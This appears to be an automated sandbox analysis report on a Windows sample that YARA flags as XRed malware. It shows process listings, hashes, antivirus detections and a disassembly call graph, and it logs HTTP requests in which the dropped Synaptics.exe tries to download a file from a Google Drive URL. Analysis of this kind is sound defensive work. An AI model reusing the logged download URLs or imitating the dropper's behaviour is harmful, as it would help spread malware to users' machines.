                                                                                              2025-01-02 19:38:56 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6b 6a 59 43 4a 5a 30 72 56 41 6e 5f 59 72 33 2d 33 36 76 70 43 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                              Data Ascii: t Found)!!1</title><style nonce="kjYCJZ0rVAn_Yr3-36vpCw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                              2025-01-02 19:38:56 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              4192.168.2.550027142.250.184.2384437364C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:38:56 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=TcN9QCbwkPLrpJEQwIqIJjJwXgW-oXjSU-FW-l0H5tI2kzHFuRd--KBktVqdEu1fwBuybsRouem5aB1kf6SzDqJs_mHS3axzjWobW0aNHGlvwStyHpwULK53oMuNR9J0QhVOYMvpAFWulneU6fX885sVSliYynvBMuD-f6LToWuopUIl13vh13I
                                                                                              2025-01-02 19:38:57 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:38:57 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-ewO_hDhg--ylvh0JOWU4lg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              5192.168.2.550029142.250.185.974437364C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:38:58 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=TcN9QCbwkPLrpJEQwIqIJjJwXgW-oXjSU-FW-l0H5tI2kzHFuRd--KBktVqdEu1fwBuybsRouem5aB1kf6SzDqJs_mHS3axzjWobW0aNHGlvwStyHpwULK53oMuNR9J0QhVOYMvpAFWulneU6fX885sVSliYynvBMuD-f6LToWuopUIl13vh13I
                                                                                              2025-01-02 19:38:58 UTC1243INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC4nIj-xFHayWQlLPQMIEN6VRTOWSws6WCBYkU9pKfPjOxbD7UolSx0sYbijBEYaJvdP
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:38:58 GMT
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-yednUhlFkoA8wB6tRtwLSA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-02 19:38:58 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                              2025-01-02 19:38:58 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 78 44 48 6a 2d 77 69 35 47 75 75 65 51 6c 41 6e 4a 65 46 64 38 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                              Data Ascii: t Found)!!1</title><style nonce="xDHj-wi5GuueQlAnJeFd8g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                              2025-01-02 19:38:58 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                              Statistics

                                                                                              CPU Usage

                                                                                              Click to jump to process

                                                                                              Memory Usage

                                                                                              Click to jump to process

                                                                                              High Level Behavior Distribution

                                                                                              Click to dive into process behavior distribution

                                                                                              Behavior

                                                                                              Click to jump to process

                                                                                              System Behavior

                                                                                              General

                                                                                              Target ID:0
                                                                                              Start time:14:37:43
                                                                                              Start date:02/01/2025
                                                                                              Path:C:\Users\user\Desktop\file.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:1'059'840 bytes
                                                                                              MD5 hash:EABA5B2C3B6607177112EC5F26438BA3
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:Borland Delphi
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000000.2035117785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.2035117785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:2
                                                                                              Start time:14:37:44
                                                                                              Start date:02/01/2025
                                                                                              Path:C:\Users\user\Desktop\._cache_file.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\._cache_file.exe"
                                                                                              Imagebase:0x1000000
                                                                                              File size:288'088 bytes
                                                                                              MD5 hash:FD6057B33E15A553DDC5D9873723CE8F
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Antivirus matches:
                                                                                              • Detection: 0%, ReversingLabs
                                                                                              Reputation:low
                                                                                              Has exited:false

                                                                                              General

                                                                                              Target ID:3
                                                                                              Start time:14:37:44
                                                                                              Start date:02/01/2025
                                                                                              Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                              Imagebase:0x400000
                                                                                              File size:771'584 bytes
                                                                                              MD5 hash:7407C51DD7AC30C4D79658D991A8B5D6
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:Borland Delphi
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                              Antivirus matches:
                                                                                              • Detection: 100%, Avira
                                                                                              • Detection: 100%, Avira
                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                              • Detection: 92%, ReversingLabs
                                                                                              Reputation:low
                                                                                              Has exited:false

                                                                                              General

                                                                                              Target ID:4
                                                                                              Start time:14:37:44
                                                                                              Start date:02/01/2025
                                                                                              Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              Imagebase:0xd90000
                                                                                              File size:498'688 bytes
                                                                                              MD5 hash:EAA6B5EE297982A6A396354814006761
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Antivirus matches:
                                                                                              • Detection: 0%, ReversingLabs
                                                                                              Reputation:low
                                                                                              Has exited:false

                                                                                              General

                                                                                              Target ID:5
                                                                                              Start time:14:37:45
                                                                                              Start date:02/01/2025
                                                                                              Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                                              Imagebase:0x590000
                                                                                              File size:53'161'064 bytes
                                                                                              MD5 hash:4A871771235598812032C822E6F68F19
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              General

                                                                                              Target ID:9
                                                                                              Start time:14:38:04
                                                                                              Start date:02/01/2025
                                                                                              Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\ProgramData\Synaptics\Synaptics.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:771'584 bytes
                                                                                              MD5 hash:7407C51DD7AC30C4D79658D991A8B5D6
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:Borland Delphi
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:11
                                                                                              Start time:14:39:48
                                                                                              Start date:02/01/2025
                                                                                              Path:C:\Windows\splwow64.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\splwow64.exe 12288
                                                                                              Imagebase:0x7ff7e5a30000
                                                                                              File size:163'840 bytes
                                                                                              MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              Disassembly

                                                                                              Reset < >

                                                                                                Execution Graph

                                                                                                Execution Coverage:20%
                                                                                                Dynamic/Decrypted Code Coverage:79.8%
                                                                                                Signature Coverage:22.3%
                                                                                                Total number of Nodes:913
                                                                                                Total number of Limit Nodes:40
                                                                                                execution_graph 2848 1002e03 GlobalAlloc 3787 1002d05 3788 1002d4f SetFilePointer 3787->3788 3789 1002d1d 3787->3789 3788->3789 3871 1002827 3872 1002843 CallWindowProcA 3871->3872 3873 1002833 3871->3873 3874 100283f 3872->3874 3873->3872 3873->3874 3875 1002948 3876 1002964 3875->3876 3877 100294f SendMessageA 3875->3877 3877->3876 3878 100366a lstrcpyA 3879 1005b32 3 API calls 3878->3879 3880 10036a2 CreateFileA 3879->3880 3881 10036d4 WriteFile 3880->3881 3882 10036c5 3880->3882 3883 10036ec CloseHandle 3881->3883 3883->3882 2847 1002e10 GlobalFree 3765 10017b1 3766 10017eb GetDesktopWindow 3765->3766 3768 10017c4 3765->3768 3772 1002969 6 API calls 3766->3772 3767 10017c7 3768->3767 3771 10017dd EndDialog 3768->3771 3770 10017fa LoadStringA SetDlgItemTextA MessageBeep 3770->3767 3771->3767 3773 10029ea SetWindowPos 3772->3773 3773->3770 3775 1003773 3776 1003782 3775->3776 3777 1003808 3775->3777 3779 100378c 3776->3779 3782 10037b6 GetDesktopWindow 3776->3782 3778 1003811 SendDlgItemMessageA 3777->3778 3781 10037ae 3777->3781 3778->3781 3780 10037a5 EndDialog 3779->3780 3779->3781 3780->3781 3783 1002969 7 API calls 3782->3783 3784 10037c8 SetDlgItemTextA SetWindowTextA SetForegroundWindow GetDlgItem 3783->3784 3786 1002803 GetWindowLongA SetWindowLongA 3784->3786 3786->3781 3791 1005075 3792 1005085 3791->3792 3793 1005137 3791->3793 3792->3793 3795 1005099 3792->3795 3796 100513c GetDesktopWindow 3792->3796 3794 10051f7 EndDialog 3793->3794 3807 10050a3 3793->3807 3794->3807 3798 10050cc 3795->3798 3799 100509c 3795->3799 3797 1002969 7 API calls 3796->3797 3800 1005153 3797->3800 3802 10050d9 ResetEvent 3798->3802 3798->3807 3801 10050aa TerminateThread EndDialog 3799->3801 3799->3807 3803 100519c SetWindowTextA CreateThread 3800->3803 3804 100515d GetDlgItem SendMessageA GetDlgItem SendMessageA 3800->3804 3801->3807 3805 10038cc 24 API calls 3802->3805 3806 10051c5 3803->3806 3803->3807 3804->3803 3808 1005100 3805->3808 3810 10038cc 24 API calls 3806->3810 3809 100511a SetEvent 3808->3809 3811 1005109 SetEvent 3808->3811 3812 100288f 4 API calls 3809->3812 3813 10051d5 EndDialog 3810->3813 3811->3807 3812->3793 3813->3807 3814 1004e56 3815 1004e68 3814->3815 3849 1004ecd EndDialog 3814->3849 3816 1004e73 3815->3816 3817 1005009 GetDesktopWindow 3815->3817 3821 1004f33 GetDlgItemTextA 3816->3821 3822 1004e87 3816->3822 3834 1004e76 3816->3834 3818 1002969 7 API calls 3817->3818 3820 1005019 SetWindowTextA SendDlgItemMessageA 3818->3820 3823 100504a GetDlgItem EnableWindow 3820->3823 3820->3834 3824 1004f55 3821->3824 3851 1004f97 3821->3851 3825 1004f19 EndDialog 3822->3825 3826 1004e8e 3822->3826 3823->3834 3827 100285f lstrlenA 3824->3827 3825->3834 3828 1004e99 LoadStringA 3826->3828 3826->3834 3830 1004f5b 3827->3830 3831 1004ed3 3828->3831 3832 1004eb9 3828->3832 3829 10038cc 24 API calls 3829->3834 3835 1004f63 GetFileAttributesA 3830->3835 3830->3851 3856 10046d4 LoadLibraryA 3831->3856 3836 10038cc 24 API calls 3832->3836 3838 1004f71 3835->3838 3839 1004fa3 3835->3839 3836->3849 3842 10038cc 24 API calls 3838->3842 3841 1005b32 3 API calls 3839->3841 3840 1004eeb SetDlgItemTextA 3840->3834 3843 1004f00 3840->3843 3844 1004fae 3841->3844 3845 1004f82 3842->3845 3847 10038cc 24 API calls 3843->3847 3848 1003e60 37 API calls 3844->3848 3845->3834 3846 1004f8b CreateDirectoryA 3845->3846 3846->3839 3846->3851 3847->3849 3850 1004fb4 3848->3850 3849->3834 3850->3851 3852 1004fc4 3850->3852 3851->3829 3853 1003f0d 40 API calls 3852->3853 3854 1004fe3 3853->3854 3854->3834 3855 1004fe7 EndDialog 3854->3855 3855->3834 3857 10046f7 GetProcAddress 3856->3857 3860 10047ee 3856->3860 3858 1004710 GetProcAddress 3857->3858 3859 10047db FreeLibrary 3857->3859 3858->3859 3861 1004723 GetProcAddress 3858->3861 3859->3860 3862 10038cc 24 API calls 3860->3862 3861->3859 3864 1004736 3861->3864 3863 1004800 3862->3863 3863->3834 3863->3840 3865 1004743 GetTempPathA lstrlenA CharPrevA 3864->3865 3868 1004773 3864->3868 3866 100476a CharPrevA 3865->3866 3865->3868 3866->3868 3867 10047c9 FreeLibrary 3867->3863 3868->3867 3869 10047c3 3868->3869 3870 10047bb lstrcpyA 3868->3870 3869->3867 3870->3869 3885 100383d 3886 10038b9 EndDialog 3885->3886 3887 1003849 3885->3887 3890 1003853 3886->3890 3888 1003882 GetDesktopWindow 3887->3888 3893 1003850 3887->3893 3889 1002969 7 API calls 3888->3889 3891 1003892 SetWindowTextA SetDlgItemTextA SetForegroundWindow 3889->3891 3891->3890 3892 1003874 EndDialog 3892->3890 3893->3890 3893->3892 3894 1002b9d 3895 1002bb4 3894->3895 3896 1002bf8 ReadFile 3894->3896 3897 1002c14 3896->3897 2849 1005a5e GetCommandLineA 2850 1005a73 GetStartupInfoA 2849->2850 2852 1005ab0 GetModuleHandleA 2850->2852 2856 1005a00 2852->2856 2867 1004c18 2856->2867 2859 1005a46 2861 1005a56 ExitProcess 2859->2861 2862 1005a4f CloseHandle 2859->2862 2862->2861 2962 1002a34 FindResourceA SizeofResource 2867->2962 2870 1004c83 CreateEventA SetEvent 2871 1002a34 6 API calls 2870->2871 2873 1004caa 2871->2873 2872 10038cc 24 API calls 2900 1004e39 2872->2900 2874 1004cd5 2873->2874 2876 1004d65 2873->2876 2877 1004cbb 2873->2877 2995 10038cc 2874->2995 2967 10030a7 2876->2967 2880 1002a34 6 API calls 2877->2880 2878 1004ce5 2878->2900 2882 1004cd1 2880->2882 2882->2874 2885 1004cf4 CreateMutexA 2882->2885 2883 1004d86 2886 1004d9d FindResourceA 2883->2886 2887 1004d8e 2883->2887 2884 1004d77 2884->2872 2885->2876 2888 1004d0c GetLastError 2885->2888 2891 1004db1 LoadResource 2886->2891 2892 1004dbe 2886->2892 3020 1001c7f 2887->3020 2888->2876 2890 1004d19 2888->2890 2893 1004d22 2890->2893 2894 1004d34 2890->2894 2891->2892 2895 1004dc6 #17 2892->2895 2896 1004dcc 2892->2896 2897 10038cc 24 API calls 2893->2897 2898 10038cc 24 API calls 2894->2898 2895->2896 2899 1004dd4 2896->2899 2896->2900 2901 1004d32 2897->2901 2902 1004d45 2898->2902 3034 10041cd GetVersionExA 2899->3034 2900->2859 2909 10058fe 2900->2909 2904 1004d4a CloseHandle 2901->2904 2902->2876 2902->2904 2904->2900 2910 1005935 2909->2910 2911 100590a 2909->2911 3176 1003d13 2910->3176 2913 1005928 2911->2913 3156 1003d9a 2911->3156 3304 1004481 2913->3304 2915 100593a 2934 10059e1 2915->2934 3191 1005636 2915->3191 2921 1005968 SetCurrentDirectoryA 2922 1005993 2921->2922 2923 1005977 2921->2923 2924 10059a0 2922->2924 3248 1005209 2922->3248 2926 10038cc 24 API calls 2923->2926 2924->2934 2935 10059bb 2924->2935 3257 1001ef8 2924->3257 2927 1005987 2926->2927 3323 1003547 GetLastError 2927->3323 2929 1005964 2929->2921 2929->2934 2932 100598c 2932->2934 2933 10059dd 2933->2934 2936 10059f6 2933->2936 2939 1002eaf 2934->2939 2935->2933 3266 1005288 2935->3266 3326 1004657 2936->3326 2940 1002ec6 2939->2940 2945 1002f02 2939->2945 2941 1002ef2 LocalFree LocalFree 2940->2941 2944 1002edd SetFileAttributesA DeleteFileA 2940->2944 2941->2940 2941->2945 2942 1002f6a 2942->2859 2952 100263f 2942->2952 2943 1002f53 2943->2942 3755 1001946 2943->3755 2944->2941 2945->2943 2946 1002f1b lstrcpyA 2945->2946 2948 1002f34 2946->2948 2949 1002f3e SetCurrentDirectoryA 2946->2949 2950 1005b71 5 API calls 2948->2950 2951 1001c7f 16 API calls 2949->2951 2950->2949 2951->2943 2953 1002646 2952->2953 2958 100264b 2952->2958 2954 1002613 14 API calls 2953->2954 2954->2958 2955 10038cc 24 API calls 2959 100266e 2955->2959 2956 1002689 3759 10018b5 GetCurrentProcess OpenProcessToken 2956->3759 2957 100267d ExitWindowsEx 2960 100268e 2957->2960 2958->2955 2958->2959 2958->2960 2959->2956 2959->2957 2959->2960 2960->2859 2963 1002a59 2962->2963 2965 1002a7d 2962->2965 2964 1002a62 FindResourceA LoadResource LockResource 2963->2964 2963->2965 2964->2965 2966 1002a81 FreeResource 2964->2966 2965->2870 2965->2884 2966->2965 2968 1003466 2967->2968 2991 10030c4 2967->2991 2968->2883 2968->2884 2969 100317c 2969->2968 2970 100319a GetModuleFileNameA 2969->2970 2972 10031c1 2970->2972 2973 10031b9 2970->2973 2971 10030fb CharNextA 2971->2991 2972->2968 3075 1005be8 2973->3075 2975 10031e4 CharUpperA 2976 1003518 2975->2976 2975->2991 3087 100189e 2976->3087 2979 10033db lstrlenA 2979->2991 2980 100348e lstrlenA 2980->2991 2981 1003526 CloseHandle 2982 100352d ExitProcess 2981->2982 2983 1005b00 IsDBCSLeadByte CharNextA 2983->2991 2984 1003324 CharUpperA 2984->2991 2985 1003417 CharUpperA 2985->2991 2986 10032ef lstrcmpiA 2986->2991 2987 100338c CharUpperA 2987->2991 2988 100343c lstrcpyA 3080 1005b32 lstrlenA 2988->3080 2989 100327a CharUpperA 2989->2991 2991->2968 2991->2969 2991->2971 2991->2975 2991->2979 2991->2980 2991->2983 2991->2984 2991->2985 2991->2986 2991->2987 2991->2988 2991->2989 2992 100302b lstrlenA 2991->2992 2994 10034fe lstrcpyA 2991->2994 3084 100285f 2991->3084 2992->2991 2994->2991 2996 10038f2 2995->2996 3005 100394c 2995->3005 3093 1002aa6 2996->3093 2999 1003954 3001 10039a3 2999->3001 3002 100395a lstrlenA lstrlenA lstrlenA LocalAlloc 2999->3002 3000 100390f 3096 1005d22 3000->3096 3006 10039a9 lstrlenA lstrlenA LocalAlloc 3001->3006 3007 10039ec lstrlenA LocalAlloc 3001->3007 3004 100398a wsprintfA 3002->3004 3002->3005 3009 1003a1b MessageBeep 3004->3009 3005->2878 3006->3005 3010 10039d6 wsprintfA 3006->3010 3007->3005 3011 1003a0d lstrcpyA 3007->3011 3013 1005d22 6 API calls 3009->3013 3010->3009 3011->3009 3012 1003927 MessageBoxA 3012->3005 3016 1003a29 3013->3016 3017 1003a3c MessageBoxA LocalFree 3016->3017 3019 1005cd4 EnumResourceLanguagesA 3016->3019 3017->3005 3019->3017 3021 1001da2 3020->3021 3022 1001c94 3020->3022 3021->2878 3022->3021 3023 1001c9d lstrcpyA lstrcatA FindFirstFileA 3022->3023 3023->3021 3024 1001ce3 lstrcpyA 3023->3024 3025 1001d51 lstrcatA SetFileAttributesA DeleteFileA 3024->3025 3026 1001cfc lstrcmpA 3024->3026 3027 1001d7a FindNextFileA 3025->3027 3026->3027 3028 1001d0c lstrcmpA 3026->3028 3027->3024 3030 1001d92 FindClose RemoveDirectoryA 3027->3030 3028->3027 3029 1001d22 lstrcatA 3028->3029 3031 1005b32 3 API calls 3029->3031 3030->3021 3032 1001d43 3031->3032 3032->3027 3033 1001c7f 3 API calls 3032->3033 3033->3032 3035 10041f3 3034->3035 3036 100420d 3034->3036 3037 10038cc 24 API calls 3035->3037 3036->3035 3038 1004222 3036->3038 3049 1004208 3037->3049 3039 1004360 3038->3039 3038->3049 3117 1002691 3038->3117 3041 100445b 3039->3041 3043 10043be MessageBeep 3039->3043 3039->3049 3042 10038cc 24 API calls 3041->3042 3042->3049 3044 1005d22 6 API calls 3043->3044 3045 10043cb 3044->3045 3046 10043de MessageBoxA 3045->3046 3047 1005cd4 EnumResourceLanguagesA 3045->3047 3046->3049 3047->3046 3049->2900 3050 100168b 3049->3050 3051 10016b8 3050->3051 3056 100179c 3050->3056 3148 10015f6 LoadLibraryA 3051->3148 3054 10016c9 GetCurrentProcess OpenProcessToken 3055 10016e4 GetTokenInformation 3054->3055 3054->3056 3057 1001790 CloseHandle 3055->3057 3058 1001700 GetLastError 3055->3058 3056->2900 3068 1004161 FindResourceA 3056->3068 3057->3056 3058->3057 3059 100170f LocalAlloc 3058->3059 3060 1001720 GetTokenInformation 3059->3060 3061 100178f 3059->3061 3062 1001733 AllocateAndInitializeSid 3060->3062 3063 1001788 LocalFree 3060->3063 3061->3057 3062->3063 3066 1001754 3062->3066 3063->3061 3064 100177f FreeSid 3064->3063 3065 100175b EqualSid 3065->3066 3067 1001772 3065->3067 3066->3064 3066->3065 3066->3067 3067->3064 3069 10041b1 3068->3069 3070 100417c LoadResource 3068->3070 3072 10038cc 24 API calls 3069->3072 3070->3069 3071 100418a DialogBoxIndirectParamA FreeResource 3070->3071 3071->3069 3073 10041c1 3071->3073 3072->3073 3073->2878 3076 1005bf2 3075->3076 3077 1005c15 3076->3077 3079 1005c07 CharNextA 3076->3079 3090 1005ad3 3076->3090 3077->2972 3079->3076 3081 1005b47 CharPrevA 3080->3081 3082 1005b54 lstrcpyA 3080->3082 3081->3082 3082->2991 3085 1002868 lstrlenA 3084->3085 3086 1002874 3084->3086 3085->3086 3086->2991 3088 10038cc 24 API calls 3087->3088 3089 10018b4 3088->3089 3089->2981 3089->2982 3091 1005ae9 3090->3091 3092 1005ade IsDBCSLeadByte 3090->3092 3091->3076 3092->3091 